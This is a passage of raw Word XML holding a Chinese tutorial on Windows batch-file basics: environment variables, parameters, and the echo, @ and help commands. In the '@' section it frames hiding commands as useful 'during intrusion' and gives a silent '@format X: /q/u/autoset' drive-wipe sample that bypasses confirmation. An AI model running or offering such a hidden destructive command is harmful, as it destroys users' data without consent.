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D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t>基础部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>======================================================================</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>一、基础语法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>批处理文件是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“.bat”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>结尾的文本文件，这个文件的每一行都是一条</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令。可以使用任何文本文件编辑工具创建和修改。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>批处理是一种简单的程序，可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> goto </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>来控制流程，也可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>循环。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>批处理的编程能力远不如</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语言等编程语言，也十分不规范。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>每个编写好的批处理文件都相当于一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的外部命令，把它所在的目录放到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>搜索路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(path)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中，即可在任意位置运行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    5.C:\AUTOEXEC.BAT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是每次系统启动时都会自动运行的，可以将每次启动时都要运行的命令放入该文件中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>大小写不敏感</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令符忽略大小写</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>批处理的文件扩展名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> .bat </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> .cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    8.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在命令提示下键入批处理文件的名称，或者双击该批处理文件，系统就会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>来运行该文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>二、参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>系统参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="图片 2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r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="图片 2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r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">       %SystemRoot%   ===    C:\WINDOWS    (%windir% </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>同样</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       %ProgramFiles% ===    C:\Program Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       %USERPROFILE%  ===    C:\Documents and Settings\Administrator  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>子目录有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>桌面</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”,“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>开始菜单</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”,“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>收藏夹</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       %APPDATA%      ===    C:\Documents and Settings\Administrator\Application Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       %TEMP%         ===    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp  (%TEM% </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>同样</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       %APPDATA%      ===    C:\Documents and Settings\Administrator\Application Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       %OS%           ===    Windows_NT (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       %Path%         ===    %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>原本的设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       %HOMEDRIVE%    ===    C:   (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>系统盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       %HOMEPATH%     ===    \Documents and Settings\Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>枚举当前的环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       setlocal enabledelayedexpansion</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       FOR /F "usebackq delims==" %%i IN (`set`) DO @echo %%i    !%%i!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="图片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p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="图片 2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r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>传递参数给批处理文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      %[1-9]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示参数，参数是指在运行批处理文件时在文件名后加的以空格</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Tab)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>分隔的字符串。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>变量可以从</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>%0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>%9</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>%0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示批处理命令本身，其它参数字符串用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> %1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> %9 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>顺序表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0"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r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">      Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        call test2.bat "hello" "haha" (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>执行同目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“test2.bat”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件，并输入两个参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“test2.bat”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件里写</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        echo %1  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>打印</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: "hello")</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        echo %2  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>打印</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: "haha")</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        echo %0  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>打印</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: test2.bat)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        echo %19 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>打印</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: "hello"9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="图片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r w:rsidRPr="00D84D5E">
        <w:t>三、批处理基本命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">0. help </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  /? </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>可显示此命令的帮助信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> type /? &gt;&gt;tmp.txt  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>把</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令的帮助信息写入到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>tmp.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件里</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> help type  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示跟</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“type /?”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>一样</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">1.Echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: echo [{on|off}] [message]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  ECHO [ON | OFF]   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>打开回显或关闭回显功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  ECHO              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示当前回显设置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  ECHO [message]    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  echo off </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示在此语句后所有运行的命令都不显示命令行本身；默认是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>时会显示如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> C:\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件夹路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在实际应用中我们会把这条命令和重定向符号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>也称为管道符号，一般用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> &gt; &gt;&gt; ^ )</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>结合来实现输入一些命令到特定格式的文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> echo off</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> echo hello world  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“hello world”)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> echo Windows Registry Editor Version 5.00 &gt; c:\setupreg.reg (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>此前还没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> setupreg.reg </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这个文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> echo "SourcePath"="D:\\Win2003\\" &gt;&gt; c:\setupreg.reg   (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>追加内容进</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> setupreg.reg </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这个文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">2.@ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示不显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>后面的命令，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在入侵过程中自然不能让对方看到你使用的命令啦</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  @ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> echo off </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>相象，但它是加在每个命令行的最前面，表示运行时不显示这一行的命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t>行</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>只能影响当前行</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> @echo off  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>此语句常用于开头，表示不显示所有的命令行信息，包括此句</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> @echo please wait a minite...</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> @format X: /q/u/autoset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  (format </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这个命令是不可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/y</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这个参数的，可喜的是微软留了个</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>autoset</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这个参数给我们，效果和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/y</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是一样的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">3.Goto </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
